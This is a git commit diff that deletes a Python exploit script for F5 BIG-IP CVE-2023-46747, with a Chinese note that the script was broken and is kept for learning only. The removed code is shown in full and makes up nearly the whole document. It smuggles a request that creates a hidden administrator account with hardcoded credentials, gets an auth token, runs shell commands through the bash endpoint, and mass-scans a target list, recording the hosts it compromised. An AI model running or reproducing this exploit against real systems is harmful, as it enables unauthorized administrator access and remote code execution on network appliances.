Update f5_CVE-2023-46747_exploit.py

Author: VulnExpo

f5_CVE-2023-46747_exploit.py

@@ -1,126 +1 @@
-# 作者: VulnExpo
-# 日期: 2023-10-31
-
-import requests
-import argparse
-import binascii
-import json
-import time
-
-requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':!DH'
-requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
-
-def send_request(url, endpoint, data, headers=None):
-    try:
-        response = requests.post(f"{url}/{endpoint}", data=data, headers=headers, verify=False, timeout=10)
-        if response.status_code == 200:
-            return response
-        else:
-            print(f"请求URL: {url}/{endpoint}\n请求失败，状态码: {response.status_code}")
-            return None
-    except requests.exceptions.RequestException as e:
-        print(f"请求错误: {e}")
-        return None
-
-def check_for_vulnerability(url, username, password, success_file=None):
-    login_request_hex = "0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d684e573153266e616d655f6265666f72653d267061737377643d6b616c643141396f316e49486179267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00"
-    login_data = b"204\r\n" + binascii.unhexlify(login_request_hex) + b"\r\n0\r\n\r\n"
-    login_headers = {
-        "Content-Type": "application/x-www-form-urlencoded",
-    }
-
-    response_login = send_request(url, "tmui/login.jsp", login_data, login_headers)
-    if response_login is None:
-        return
-
-    authn_data = {
-        "username": username,
-        "password": password,
-    }
-    authn_headers = {
-        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
-        "Connection": "close",
-        "Content-Length": "51",
-        "Content-Type": "application/json",
-        "Accept-Encoding": "gzip",
-    }
-
-    response_authn = send_request(url, "mgmt/shared/authn/login", json.dumps(authn_data), authn_headers)
-    if response_authn is None:
-        return
-
-    try:
-        response_json = response_authn.json()
-        token = response_json.get("token", {}).get("token")
-        if token:
-            bash_data = {
-                "command": "run",
-                "utilCmdArgs": "-c id",
-            }
-            bash_headers = {
-                "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
-                "Connection": "close",
-                "Content-Length": "41",
-                "Content-Type": "application/json",
-                "X-F5-Auth-Token": token,
-                "Accept-Encoding": "gzip",
-            }
-
-            response_bash = None
-            for retry in range(5):
-                response_bash = send_request(url, "mgmt/tm/util/bash", json.dumps(bash_data), bash_headers)
-                if response_bash is not None and response_bash.status_code == 200:
-                    break
-                print(f"第 {retry + 1} 次尝试：请求失败，状态码: {response_bash.status_code}" if response_bash is not None else f"第 {retry + 1} 次尝试：请求失败，未收到响应")
-                time.sleep(1)
-
-            if response_bash is not None:
-                try:
-                    response_json = response_bash.json()
-                    command_result = response_json.get("commandResult", "No commandResult found")
-                    if command_result is not None:
-                        with open(success_file, 'a') as s_file:
-                            s_file.write(f"++++++++++++++++++\n")
-                            s_file.write(f"目标URL: {url}\n")
-                            s_file.write(f"Command Result: {command_result}\n\n")
-                        print(f"目标URL: {url}")
-                        print(f"Command Result: {command_result}")
-                except json.JSONDecodeError as e:
-                    print(f"JSON解析错误: {e}")
-        else:
-            print("未能获取认证令牌。")
-    except json.JSONDecodeError as e:
-        print(f"JSON解析错误: {e}")
-
-def scan_targets(targets, username, password, success_file=None):
-    for target in targets:
-        target = target.strip()
-        check_for_vulnerability(target, username, password, success_file)
-
-if __name__ == '__main__':
-    parser = argparse.ArgumentParser(description="F5 BIG-IP TMUI 远程代码执行漏洞CVE-2023-46747")
-    parser.add_argument("-u", "--url", help="目标URL")
-    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
-    args = parser.parse_args()
-
-    if not args.url and not args.file:
-        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
-        exit(1)
-
-    if args.url:
-        urls = [args.url]
-    elif args.file:
-        with open(args.file, 'r') as file:
-            urls = file.readlines()
-
-    success_file = 'success_targets.txt'
-    username = "hNW1S"
-    password = "kald1A9o1nIHay"
-
-    for url in urls:
-        url = url.strip()
-        if not url.startswith("http://") and not url.startswith("https://"):
-            url = "http://" + url
-        scan_targets([url], username, password, success_file)
-
-    print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")
+（抱歉，脚本存在问题，无法正常使用，所以先删了！仅作学习）